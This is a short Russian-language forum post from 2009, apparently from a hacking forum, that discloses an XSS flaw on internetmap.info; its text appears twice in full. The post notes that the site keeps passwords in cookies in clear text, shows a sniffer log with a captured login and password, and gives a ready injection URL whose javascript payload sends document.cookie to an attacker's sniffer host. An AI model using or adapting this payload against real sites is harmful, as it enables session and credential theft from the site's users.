Dimi4
24.02.2009, 20:56
internetmap.info XSS
Достаточно крупный проект. Пароли в куках там хранятся в чистом виде. При отправки на сниффер будет иметь вид:
Запрос с www.internetmap.info — 24.02.2009 16:35
IP: **.**.**.** (whois)
QUERY: b=b; login=admin@mail.ru; password=Pass; b=b
REFERER: http://www.internetmap.info/cgi-bin/engine.cgi?a=%00%3Cimg%20src='javascript:img%20=%2 0new%20Image()%3b%20img.src%20=%20%22http://www*.com/s/s.gif?%22%2bdocument.cookie%3b'%3E&i=designers&f=works
AGENT: Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0
Скрипт декодить URL, обрезает спецсимволы (; в том числе). Формируем иньекцию:
http://www.internetmap.info/cgi-bin/engine.cgi?a=%00%3Cimg%20src='javascript:img%20=%2 0new%20Image()%3b%20img.src%20=%20%22http://снифер/s/s.gif?%22%2bdocument.cookie%3b'%3E&i=designers&f=works
© Dimi4, 2009
Достаточно крупный проект. Пароли в куках там хранятся в чистом виде. При отправки на сниффер будет иметь вид:
Запрос с www.internetmap.info — 24.02.2009 16:35
IP: **.**.**.** (whois)
QUERY: b=b; login=admin@mail.ru; password=Pass; b=b
REFERER: http://www.internetmap.info/cgi-bin/engine.cgi?a=%00%3Cimg%20src='javascript:img%20=%2 0new%20Image()%3b%20img.src%20=%20%22http://www*.com/s/s.gif?%22%2bdocument.cookie%3b'%3E&i=designers&f=works
AGENT: Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0
Скрипт декодить URL, обрезает спецсимволы (; в том числе). Формируем иньекцию:
http://www.internetmap.info/cgi-bin/engine.cgi?a=%00%3Cimg%20src='javascript:img%20=%2 0new%20Image()%3b%20img.src%20=%20%22http://снифер/s/s.gif?%22%2bdocument.cookie%3b'%3E&i=designers&f=works
© Dimi4, 2009